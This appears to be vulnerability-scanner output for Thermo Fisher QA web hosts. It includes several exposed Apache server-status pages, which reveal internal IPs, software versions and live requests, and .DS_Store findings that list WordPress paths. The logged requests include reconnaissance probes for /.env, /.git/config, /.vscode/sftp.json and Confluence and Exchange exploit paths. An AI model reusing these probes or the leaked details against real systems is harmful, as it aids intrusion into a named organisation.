Apache Status Apache Server Status for qa2-corporate.thermofisher.com (via 10.253.100.55) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:19 EST Restart Time: Saturday, 11-Feb-2023 15:41:04 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 22 days 11 hours 56 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 442970 - Total Traffic: 1.2 GB - Total Duration: 98077610 CPU Usage: u83.22 s120.74 cu105.25 cs43.57 - .0181% CPU load .228 requests/sec - 651 B/second - 2858 B/request - 221.409 ms/request 45 requests currently being processed, 26 idle workers R_KRRK_R___R__KR__WR_KRWR_RWR_W_WWKRKRKRKWRR_RRR_R_RRRRRRRRRK___ _______......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-075240/0/934R 0.00284016720350.00.004.86 10.253.107.248http/1.1 1-062490/1/826_ 0.002505513517610.00.0039.10 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 2-0293553/14/812K 0.000023966862.90.1038.13 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 3-070290/1/85912R 0.00284018453590.00.00131.17 10.253.107.83http/1.1 4-075250/1/836R 0.00270013258210.00.002.29 10.253.107.83http/1.1 5-063501/2/785K 0.0023019155450.80.012.76 10.253.107.248http/1.1qa2.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 6-091790/0/40229_ 0.0021011945370.00.0061.38 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 7-063580/3/1015R 0.001011015628150.00.013.25 10.253.107.83http/1.1 8-063590/3/971_ 0.001812910425186740.00.0139.86 10.253.107.83http/1.1 9-091800/0/819_ 0.0020020553530.00.004.34 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 10-091810/0/851_ 0.0020015331600.00.003.03 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 11-089480/0/890R 0.00573019275660.00.001.96 10.253.107.83http/1.1 12-0284370/15/797_ 0.02178299812099040.00.064.39 10.253.107.83http/1.1qa2-designsystem.thermofisher.cGET /us/en/getting-started.html?1678087220 HTTP/1.1 13-063910/1/742_ 0.001812913674320.00.005.31 10.253.107.83http/1.1qa2-designsystem.thermofisher.cGET /akamai/sureroute-test-object.html HTTP/1.1 14-02717043412/108948/109288K 46.3220751400166604.6162.70163.39 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 15-075260/0/868R 0.00284016687390.00.002.80 10.253.107.83http/1.1 16-076880/0/1015_ 0.00250020983460.00.002.49 10.253.107.248http/1.1 17-091830/0/809_ 0.0019023232370.00.0070.21 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 18-030928/14/1710W 0.0100223291711.60.055.44 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /telescope/requests HTTP/1.1 19-089500/0/1027R 0.00572020832470.00.002.44 10.253.107.83http/1.1 20-091840/0/881_ 0.0019014103970.00.0038.33 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 21-086442/10/726K 0.002017173812.30.032.11 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 22-063960/0/1113R 0.001124017880560.00.003.85 10.253.107.83http/1.1 23-070642/3/946W 0.000014954382.00.004.49 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 24-024760/9/792R 0.00844312138940.00.122.11 10.253.107.248http/1.1 25-091850/0/812_ 0.0019016179180.00.002.68 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-030930/0/854R 0.00833015093100.00.004.35 10.253.107.248http/1.1 27-071434/4/1049W 0.000015355663.70.0037.40 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /telescope/requests HTTP/1.1 28-089510/0/675R 0.00572012326300.00.001.63 10.253.107.83http/1.1 29-071440/4/874_ 0.00250316156540.00.014.64 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 30-024773/19/877W 0.010018420602.80.056.33 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 31-091860/0/1029_ 0.0019014781250.00.006.60 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 32-069514/24/761W 0.0100191384116.90.042.03 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /.env HTTP/1.1 33-071452/2/827W 0.000019129371.40.0037.25 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-033292/4/823K 0.00224217949381.70.007.73 10.253.107.248http/1.1qa2.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 35-071460/3/878R 0.01844018047110.00.022.17 10.253.107.248http/1.1 36-01803123658/154730/154880K 65.893093951236412.1230.87231.18 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 37-048390/0/832R 0.00250014477430.00.0036.23 10.253.107.248http/1.1 38-089521/1/797K 0.0026012431850.70.005.10 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 39-089530/0/868R 0.00572011322600.00.006.22 10.253.107.83http/1.1 40-089608/8/778K 0.0090109718919.20.022.18 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 41-073125/26/672W 0.0200171377754.70.0536.21 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /server-status HTTP/1.1 42-0307420/10/929R 0.008442112626440.00.0237.25 10.253.107.248http/1.1 43-086480/0/646R 0.00286012931080.00.002.24 10.253.107.248http/1.1 44-086490/3/739_ 0.002507020061450.00.012.48 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-048970/6/637R 0.00284014199750.00.001.29 10.253.107.83http/1.1 46-089640/0/814R 0.00553010741820.00.003.85 10.253.107.83http/1.1 47-071470/0/617R 0.00269019302730.00.001.53 10.253.107.248http/1.1 48-091870/0/916_ 0.0018011211090.00.004.78 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 49-089650/0/673R 0.00553015293080.00.003.32 10.253.107.83http/1.1 50-071480/3/833_ 0.001822629012168500.00.013.18 10.253.107.83http/1.1 51-071490/0/653R 0.00270018583410.00.003.28 10.253.107.83http/1.1 52-086580/0/781
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e7fa2597e7fa2597669b0a8b
Apache Status Apache Server Status for qa2-corporate.thermofisher.com (via 10.253.100.55) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:17 EST Restart Time: Saturday, 11-Feb-2023 15:41:04 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 22 days 11 hours 56 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 442931 - Total Traffic: 1.2 GB - Total Duration: 98075052 CPU Usage: u83.21 s120.73 cu105.25 cs43.57 - .0181% CPU load .228 requests/sec - 651 B/second - 2858 B/request - 221.423 ms/request 37 requests currently being processed, 31 idle workers R__RR__R___R__KR___R__R_R_RRR___WRKRK_KRKWRR_RR__R_RRRRRRRRRK___ ____............................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-075240/0/934R 0.00282016720350.00.004.86 10.253.107.248http/1.1 1-062490/1/826_ 0.002485513517610.00.0039.10 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 2-0293550/11/809_ 0.00248023966260.00.1038.13 10.253.107.248http/1.1 3-070290/1/85912R 0.00282018453590.00.00131.17 10.253.107.83http/1.1 4-075250/1/836R 0.00268013258210.00.002.29 10.253.107.83http/1.1 5-063500/1/784_ 0.00248219154850.00.012.76 10.253.107.248http/1.1 6-091790/0/40229_ 0.0019011945370.00.0061.38 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 7-063580/3/1015R 0.001009015628150.00.013.25 10.253.107.83http/1.1 8-063590/3/971_ 0.001792910425186740.00.0139.86 10.253.107.83http/1.1 9-091800/0/819_ 0.0018020553530.00.004.34 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 10-091810/0/851_ 0.0018015331600.00.003.03 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 11-089480/0/890R 0.00571019275660.00.001.96 10.253.107.83http/1.1 12-0284370/15/797_ 0.02176299812099040.00.064.39 10.253.107.83http/1.1qa2-designsystem.thermofisher.cGET /us/en/getting-started.html?1678087220 HTTP/1.1 13-063910/1/742_ 0.001792913674320.00.005.31 10.253.107.83http/1.1qa2-designsystem.thermofisher.cGET /akamai/sureroute-test-object.html HTTP/1.1 14-02717043412/108948/109288K 46.3200751400166604.6162.70163.39 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 15-075260/0/868R 0.00282016687390.00.002.80 10.253.107.83http/1.1 16-076880/0/1015_ 0.00248020983460.00.002.49 10.253.107.248http/1.1 17-091830/0/809_ 0.0017023232370.00.0070.21 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 18-030920/6/1702_ 0.002484422324340.00.035.43 10.253.107.248http/1.1 19-089500/0/1027R 0.00570020832470.00.002.44 10.253.107.83http/1.1 20-091840/0/881_ 0.0017014103970.00.0038.33 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 21-086440/8/724_ 0.002682917172150.00.032.11 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 22-063960/0/1113R 0.001122017880560.00.003.85 10.253.107.83http/1.1 23-070640/1/944_ 0.00267014952380.00.004.49 10.253.107.248http/1.1 24-024760/9/792R 0.00842312138940.00.122.11 10.253.107.248http/1.1 25-091850/0/812_ 0.0017016179180.00.002.68 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-030930/0/854R 0.00831015093100.00.004.35 10.253.107.248http/1.1 27-071430/0/1045R 0.00282015353000.00.0037.40 10.253.107.248http/1.1 28-089510/0/675R 0.00570012326300.00.001.63 10.253.107.83http/1.1 29-071440/4/874_ 0.00248316156540.00.014.64 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 30-024770/16/874_ 0.012482218419800.00.056.32 10.253.107.248http/1.1 31-091860/0/1029_ 0.0017014781250.00.006.60 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 32-06954/14/751W 0.010019132365.20.032.02 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 33-071450/0/825R 0.00268019127030.00.0037.24 10.253.107.248http/1.1 34-033292/4/823K 0.00204217949381.70.007.73 10.253.107.248http/1.1qa2.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 35-071460/3/878R 0.01842018047110.00.022.17 10.253.107.248http/1.1 36-01803123658/154730/154880K 65.891093951236412.1230.87231.18 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 37-048390/0/832_ 0.00248014477430.00.0036.23 10.253.107.248http/1.1 38-089521/1/797K 0.0024012431850.70.005.10 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 39-089530/0/868R 0.00570011322600.00.006.22 10.253.107.83http/1.1 40-089608/8/778K 0.0070109718919.20.022.18 10.253.107.83http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 41-073121/22/668W 0.0100171337246.00.0536.20 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /server-status HTTP/1.1 42-0307420/10/929R 0.008422112626440.00.0237.25 10.253.107.248http/1.1 43-086480/0/646R 0.00284012931080.00.002.24 10.253.107.248http/1.1 44-086490/3/739_ 0.002487020061450.00.012.48 10.253.107.248http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 45-048970/6/637R 0.00282014199750.00.001.29 10.253.107.83http/1.1 46-089640/0/814R 0.00551010741820.00.003.85 10.253.107.83http/1.1 47-071470/0/617_ 0.00267019302730.00.001.53 10.253.107.248http/1.1 48-091870/0/916_ 0.0016011211090.00.004.78 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 49-089650/0/673R 0.00551015293080.00.003.32 10.253.107.83http/1.1 50-071480/3/833_ 0.001802629012168500.00.013.18 10.253.107.83http/1.1 51-071490/0/653R 0.00268018583410.00.003.28 10.253.107.83http/1.1 52-086580/0/781R 0.00284012093770.00.003.14 10.253.107.83http/1.1 53-086590/0/678R 0.0028409622660.00.0035.64 10.253.107.248http/1.1 54-034280/0/603R 0.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e7fa2597e7fa2597cee58030
Apache Status Apache Server Status for qa2-corporate.thermofisher.com (via 10.253.100.55) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:17 EDT Restart Time: Tuesday, 11-Oct-2022 01:30:13 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 9 days 4 hours 24 minutes 4 seconds Server load: 0.01 0.02 0.00 Total accesses: 184088 - Total Traffic: 682.3 MB - Total Duration: 9537067 CPU Usage: u35.01 s70.99 cu55.31 cs33.44 - .0245% CPU load .232 requests/sec - 901 B/second - 3886 B/request - 51.8071 ms/request 48 requests currently being processed, 20 idle workers KRKRWRKRRRWRWWKWWWWRRRRRRRKK________R_K__RRRRRR_R______W_R_K.... ...................RR.....W.....W.....R...................R..W.. ..W............................................................. ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0107519858/9858/10083K 5.955010299815035.014.6816.82 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 1-066960/0/228R 0.0010110992910.00.001.09 10.253.107.180http/1.1 2-066976/6/326K 0.00230302326.00.014.84 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 3-066980/0/268R 0.00101001565770.00.000.66 10.253.107.180http/1.1 4-029561/39/279W 0.01001654341.10.053.22 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /info.php HTTP/1.1 5-035830/3/69800R 0.0011765769764250.00.03105.51 10.253.107.180http/1.1 6-01100113808/79344/79344K 47.065061110120623.8117.80117.80 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 7-035840/0/373R 0.007060498210.00.007.15 10.253.107.180http/1.1 8-071460/0/308R 0.0019901894500.00.005.32 10.253.107.67http/1.1 9-035850/2/331R 0.00118326792000.00.002.06 10.253.107.67http/1.1 10-029590/14/188W 0.01001621810.00.020.76 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 11-029600/102/435R 0.045801827590.00.1537.97 10.253.107.67http/1.1 12-029610/10/624W 0.00001607320.00.013.77 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-029620/0/265W 0.000010942580.00.002.37 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /info.php HTTP/1.1 14-019702/49/239K 0.04101254281.90.080.65 10.253.107.67http/1.1qa2.onelambda.com:80GET / HTTP/1.1 15-072540/0/232W 0.00001435150.00.000.81 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 16-029646/318/695W 0.2000768996.80.443.70 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /telescope/requests HTTP/1.1 17-035892/2/201W 0.00001982802.30.001.33 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.git/config HTTP/1.1 18-072560/0/579W 0.00001001250.00.0014.24 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /server-status HTTP/1.1 19-029680/0/352R 0.0087101297520.00.008.27 10.253.107.67http/1.1 20-057720/0/265R 0.00118301445470.00.001.33 10.253.107.180http/1.1 21-035910/1/337R 0.001181251075920.00.004.30 10.253.107.180http/1.1 22-035920/2/382R 0.00399133528480.00.004.29 10.253.107.67http/1.1 23-057730/0/220R 0.00118302104610.00.000.59 10.253.107.67http/1.1 24-057740/0/381R 0.0011810979580.00.003.16 10.253.107.180http/1.1 25-057750/4/264R 0.0070420221241600.00.001.61 10.253.107.180http/1.1 26-057761/1/342K 0.00901169790.80.004.55 10.253.107.180http/1.1qa2-corporate.thermofisher.com:HEAD / HTTP/1.1 27-057771/1/261K 0.00927888901.40.001.17 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 28-072570/0/247R 0.00901461270.00.001.77 10.253.107.67http/1.1 29-072600/0/262_ 0.00801171470.00.001.46 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 30-072610/0/196_ 0.00802071110.00.000.35 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 31-072620/0/411_ 0.00802117310.00.0043.51 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 32-072630/0/330_ 0.00802669450.00.0038.10 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 33-072640/0/318_ 0.00701431770.00.005.41 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 34-072650/0/222_ 0.0070249000.00.000.52 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 35-072660/0/327_ 0.00702434750.00.001.15 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 36-029840/102/284R 0.068760369460.00.140.66 10.253.107.180http/1.1 37-072670/0/217_ 0.00701857350.00.000.64 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-029863/4/240K 0.00620298090512.90.012.51 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 39-072680/0/333_ 0.0070709280.00.004.62 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 40-072690/0/291_ 0.00702461000.00.004.88 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-029880/0/326R 0.0070603538490.00.006.29 10.253.107.180http/1.1 42-029890/0/385R 0.008580799050.00.002.15 10.253.107.67http/1.1 43-029900/2/247R 0.0085531815760.00.0136.37 10.253.107.67http/1.1 44-029910/0/422R 0.0085801422560.00.002.12 10.253.107.67http/1.1 45-029920/1/299R 0.00136933309210.00.002.34 10.253.107.67http/1.1 46-031960/1/339R 0.0011831421116840.00.000.61 10.253.107.67http/1.1 47-072700/0/225_ 0.0070249700.00.003.95 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 48-031980/0/459R 0.007060697190.00.008.11 10.253.107.180http/1.1 49-072710/0/214_ 0.00701559730.00.000.45 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 50-072760/0/169_ 0.0020111410.00.000.63 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 51-072770/0/199_ 0.00101193460.00.001.40 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 52-072780/0/194_ 0.0010748910.00.0034.55 127.0.0.1http/1.1qa2-corporate.thermofisher.com:O
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e7fa2597e7fa2597711ee90f
Apache Status Apache Server Status for qa2-corporate.thermofisher.com (via 10.253.100.55) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:17 EDT Restart Time: Tuesday, 11-Oct-2022 01:30:13 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 9 days 4 hours 24 minutes 4 seconds Server load: 0.01 0.02 0.00 Total accesses: 184092 - Total Traffic: 682.3 MB - Total Duration: 9537075 CPU Usage: u35.01 s70.99 cu55.31 cs33.44 - .0245% CPU load .232 requests/sec - 901 B/second - 3886 B/request - 51.806 ms/request 53 requests currently being processed, 15 idle workers KRKRWRKRRRWRWWKWWWWRRRRRRRKKWWWWR___R_K__RRRRRR_R______W_R_K.... ...................RR.....W.....W.....R...................R..W.. ..W............................................................. ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0107519858/9858/10083K 5.955010299815035.014.6816.82 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 1-066960/0/228R 0.0010110992910.00.001.09 10.253.107.180http/1.1 2-066977/7/327K 0.0000302327.20.014.84 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET / HTTP/1.1 3-066980/0/268R 0.00101001565770.00.000.66 10.253.107.180http/1.1 4-029561/39/279W 0.01001654341.10.053.22 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /info.php HTTP/1.1 5-035830/3/69800R 0.0011775769764250.00.03105.51 10.253.107.180http/1.1 6-01100113808/79344/79344K 47.066061110120623.8117.80117.80 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 7-035840/0/373R 0.007070498210.00.007.15 10.253.107.180http/1.1 8-071460/0/308R 0.0019901894500.00.005.32 10.253.107.67http/1.1 9-035850/2/331R 0.00118426792000.00.002.06 10.253.107.67http/1.1 10-029590/14/188W 0.01001621810.00.020.76 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 11-029600/102/435R 0.045901827590.00.1537.97 10.253.107.67http/1.1 12-029610/10/624W 0.00001607320.00.013.77 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-029620/0/265W 0.000010942580.00.002.37 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /info.php HTTP/1.1 14-019702/49/239K 0.04201254281.90.080.65 10.253.107.67http/1.1qa2.onelambda.com:80GET / HTTP/1.1 15-072540/0/232W 0.00001435150.00.000.81 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 16-029646/318/695W 0.2000768996.80.443.70 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /telescope/requests HTTP/1.1 17-035892/2/201W 0.00001982802.30.001.33 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.git/config HTTP/1.1 18-072561/1/580W 0.00001001335.20.0114.25 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.env HTTP/1.1 19-029680/0/352R 0.0087201297520.00.008.27 10.253.107.67http/1.1 20-057720/0/265R 0.00118401445470.00.001.33 10.253.107.180http/1.1 21-035910/1/337R 0.001182251075920.00.004.30 10.253.107.180http/1.1 22-035920/2/382R 0.00400133528480.00.004.29 10.253.107.67http/1.1 23-057730/0/220R 0.00118402104610.00.000.59 10.253.107.67http/1.1 24-057740/0/381R 0.0011820979580.00.003.16 10.253.107.180http/1.1 25-057750/4/264R 0.0070520221241600.00.001.61 10.253.107.180http/1.1 26-057761/1/342K 0.00901169790.80.004.55 10.253.107.180http/1.1qa2-corporate.thermofisher.com:HEAD / HTTP/1.1 27-057771/1/261K 0.00927888901.40.001.17 10.253.107.180http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 28-072570/0/247W 0.00001461270.00.001.77 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /s/32332e33362e3136322e3639/_/;/META-INF/maven/com.atlassia 29-072600/0/262W 0.00001171470.00.001.46 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 30-072610/0/196W 0.00002071110.00.000.35 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /server-status HTTP/1.1 31-072622/2/413W 0.00002117321.90.0043.51 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 32-072630/0/330R 0.00802669450.00.0038.10 10.253.107.67http/1.1 33-072640/0/318_ 0.00701431770.00.005.41 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 34-072650/0/222_ 0.0070249000.00.000.52 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 35-072660/0/327_ 0.00702434750.00.001.15 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 36-029840/102/284R 0.068770369460.00.140.66 10.253.107.180http/1.1 37-072670/0/217_ 0.00701857350.00.000.64 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-029863/4/240K 0.00620298090512.90.012.51 10.253.107.67http/1.1qa2-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 39-072680/0/333_ 0.0070709280.00.004.62 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 40-072690/0/291_ 0.00702461000.00.004.88 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-029880/0/326R 0.0070703538490.00.006.29 10.253.107.180http/1.1 42-029890/0/385R 0.008590799050.00.002.15 10.253.107.67http/1.1 43-029900/2/247R 0.0085631815760.00.0136.37 10.253.107.67http/1.1 44-029910/0/422R 0.0085901422560.00.002.12 10.253.107.67http/1.1 45-029920/1/299R 0.00137033309210.00.002.34 10.253.107.67http/1.1 46-031960/1/339R 0.0011841421116840.00.000.61 10.253.107.67http/1.1 47-072700/0/225_ 0.0070249700.00.003.95 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 48-031980/0/459R 0.007070697190.00.008.11 10.253.107.180http/1.1 49-072710/0/214_ 0.00701559730.00.000.45 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 50-072760/0/169_ 0.0020111410.00.000.63 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 51-072770/0/199_ 0.00101193460.00.001.40 127.0.0.1http/1.1qa2-corporate.thermofisher.com:OPTIONS * HTTP/1.0 52-072780/0/194_ 0.0010748910.00.0034.55 127.
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d80af1e5580af1e5580af1e5580af1e55
Found 1 files trough .DS_Store spidering: /wp-content
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec547fc35247f78f459e254f3d994c68be
Found 17 files trough .DS_Store spidering: /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields-pro /wp-content/plugins/ithemes-security-pro /wp-content/uploads /wp-content/uploads/2016 /wp-content/uploads/2016/08 /wp-content/uploads/2016/12 /wp-content/uploads/2017 /wp-content/uploads/2017/06 /wp-content/uploads/2017/07 /wp-content/uploads/2017/08 /wp-content/uploads/2017/09 /wp-content/uploads/2017/10 /wp-content/uploads/2017/11 /wp-content/uploads/2017/12 /wp-content/uploads/2018
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f0fde1b6377a2dc9a7990750a1c4f43ec
